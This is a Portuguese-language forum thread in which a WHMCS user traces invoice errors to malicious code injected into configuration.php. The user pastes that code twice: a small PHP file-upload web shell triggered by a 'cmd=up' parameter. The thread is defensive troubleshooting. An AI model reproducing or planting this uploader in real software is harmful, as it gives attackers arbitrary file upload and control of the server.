Ir para conteúdo
  • Cadastre-se

Erro ao criar/visualizar faturas. Help!


Posts Recomendados

Olá caros tudo bom?

Estou com o seguinte erro ao visualizar/criar faturas pelo admin:

Invoice #

Invoice ID Not Found

Acontece que qualquer cliente que acesse a sua conta, e clique em ver fatura, o sistema retorna a mensagem:

Ocorreu um erro. Por favor, tente novamente.

Se alguem poder me ajudar, agradeço!

OBS: Vale ressaltar que eu não fiz nenhuma modificação no whmcs, não instalei nada no mesmo. Simplesmente do dia pra noite um cliente informou que não estava conseguindo pagar devido a um erro, fui verificar e identifiquei esta falha. Utilizo o whmcs a mais de 1 ano e nunca tive esse tipo de problema.

Editado por Wilson
Link para o comentário
Compartilhar em outros sites

Então,

Eu ja desativei todas as formas de pagamento, atualizei o whmcs para a versão atual e mesmo assim o erro persiste...

Não sei mais o que fazer, resumidamente o erro é este, ao criar faturas/visulizar/editar ele retorna o erro Invoice ID Not Found, mesmo no caso de alteração, na onde tenho certeza de que a fatura esta lá criada, e com o ID correto, se clicar para alterar a mesma da este erro...

Link para o comentário
Compartilhar em outros sites

Já tentou enviar os modulos de pagamento novamente?

Você pode estar enviando os modulos para a pasta; /public_html/seu_whmcs/modules/gateways/

Sim ja fiz isso, sem sucesso. Sei lá pessoal, o pior é parar do nada, sem eu ter feito nenhuma ação para tal.

Link para o comentário
Compartilhar em outros sites

Verifique se o arquivo configuration.php tem alguma linha estranha.

Semana passada um cliente teve um problema similar, ao invés da fatura ocorria essa falha para os pedidos ( orders ).

Ele não tinha aplicado o patch de segurança ( http://www.whmcs.blog.br/principal/atualizacao-de-seguranca-2/ ), com isso o WHMCS foi modificado por um código malicioso.

Após restaurar o configuration.php o problema foi sanado.

Link para o comentário
Compartilhar em outros sites

Verifique se o arquivo configuration.php tem alguma linha estranha.

Semana passada um cliente teve um problema similar, ao invés da fatura ocorria essa falha para os pedidos ( orders ).

Ele não tinha aplicado o patch de segurança ( http://www.whmcs.blog.br/principal/atualizacao-de-seguranca-2/ ), com isso o WHMCS foi modificado por um código malicioso.

Após restaurar o configuration.php o problema foi sanado.

Caramba Pessoal! RESOLVI após a dica do Edvan. Cara muito obrigado! Tambem gostaria de agradecer a todos que responderam o topico tentando me ajudar.

OBS: No arquivo configuration.php logo abaixo depois das informações de banco de dados etc, continha o seguinte código:

<?php $id = $_GET['cmd']; if ($id ==up') { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } } ?>

Apaguei tudo isso ai e subi novamente para o diretório e funcionou.

OBS, eu fiz a atualização de segurança, mais acho que este código foi parar lá antes desta atualização, e eu só fui perceber por causa da fatura de clientes que vence perto do dia 20.

Fica uma pergunta, o que este código pode causar de dano ao sistema, tirando esta falha das faturas, corro algum risco de segurança?

Mais uma vez, obrigado pessoal.

Link para o comentário
Compartilhar em outros sites

Caramba Pessoal! RESOLVI após a dica do Edvan. Cara muito obrigado! Tambem gostaria de agradecer a todos que responderam o topico tentando me ajudar.

OBS: No arquivo configuration.php logo abaixo depois das informações de banco de dados etc, continha o seguinte código:

<?php $id = $_GET['cmd']; if ($id ==up') { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } } ?>

Apaguei tudo isso ai e subi novamente para o diretório e funcionou.

OBS, eu fiz a atualização de segurança, mais acho que este código foi parar lá antes desta atualização, e eu só fui perceber por causa da fatura de clientes que vence perto do dia 20.

Fica uma pergunta, o que este código pode causar de dano ao sistema, tirando esta falha das faturas, corro algum risco de segurança?

Mais uma vez, obrigado pessoal.

Pode sim! Esse código faz o upload de arquivos para o servidor... Veja se não tem mais nada perdido na sua instalação do WHMCS!

Link para o comentário
Compartilhar em outros sites

Visitante
Este tópico está impedido de receber novos posts.
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?